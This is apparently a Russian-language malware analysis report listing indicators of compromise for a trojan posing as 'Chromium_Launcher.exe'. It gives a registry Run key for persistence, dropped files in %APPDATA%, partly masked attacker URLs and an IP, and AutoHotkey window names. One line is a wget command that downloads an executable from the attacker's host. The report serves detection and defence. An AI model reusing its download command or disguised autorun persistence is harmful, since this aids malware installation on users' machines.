Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Google Chromium' = '"%APPDATA%\Chromium_Launcher.exe"'
- Средство контроля пользовательских учетных записей (UAC)
- '%APPDATA%\wget.exe' -O "%APPDATA%\arsiv.exe" "http://tm####evideo.mobi/usjer/hash.php?do########"
- '%APPDATA%\Chromium_Launcher.exe'
- %APPDATA%\hash.txt
- %APPDATA%\wget.exe
- %APPDATA%\arsiv.exe
- %APPDATA%\bg.txt
- %APPDATA%\Chromium_Launcher.exe
- %APPDATA%\atak.exe
- %APPDATA%\update.txt
- %APPDATA%\hash.txt
- %APPDATA%\update.txt
- %APPDATA%\atak.exe
- 'tm####evideo.mobi':80
- '74.##5.232.51':80
- tm####evideo.mobi/usjer/hash.php?ha####
- tm####evideo.mobi/usjer/hash.php?do########
- tm####evideo.mobi/usjer/background.js
- tm####evideo.mobi/usjer/atak.exe
- tm####evideo.mobi/usjer/update.php?ha####
- DNS ASK tm####evideo.mobi
- DNS ASK www.google.com
- ClassName: 'Indicator' WindowName: ''
- ClassName: 'AutoHotkey' WindowName: '%APPDATA%\Chromium_Launcher.exe'
- ClassName: 'AutoHotkey' WindowName: '<Полный путь к вирусу>'